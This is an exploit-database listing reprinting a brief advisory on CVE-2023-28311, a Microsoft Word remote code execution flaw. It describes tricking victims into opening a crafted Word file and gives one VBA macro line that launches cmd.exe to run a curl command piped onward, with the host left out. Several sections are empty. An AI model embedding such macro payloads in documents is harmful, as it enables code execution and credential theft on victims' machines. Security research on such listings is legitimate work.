Microsoft Word Remote Code Execution

CVE Category Price Severity
CVE-2023-28311 CWE-119 $50,000 High
Author Risk Exploitation Type Date
Unknown High Remote 2023-04-15
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

Microsoft Word Remote Code Execution
## Title: Microsoft Word Remote Code Execution Vulnerability
## Author: nu11secur1ty
## Date: 04.14.2023
## Vendor:
## Software:
## Reference:
## CVE-2023-28311

## Description:
The attack itself is carried out locally by a user with authentication to
the targeted system. An attacker could exploit the vulnerability by
convincing a victim, through social engineering, to download and open a
specially crafted file from a website which could lead to a local attack on
the victim's computer. The attacker can trick the victim to open a
malicious web page by using a `Word` malicious file and he can steal
credentials, bank accounts information, sniffing and tracking all the
traffic of the victim without stopping - it depends on the scenario and etc.

STATUS: HIGH Vulnerability

The exploit server must be BROADCASTING at the moment when the victim hit
the button of the exploit!

  Call Shell("cmd.exe /S /c" & "curl -s | tarator", vbNormalFocus)

## Reproduce:

## Reference:


## Proof and Exploit

## Time spend:

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum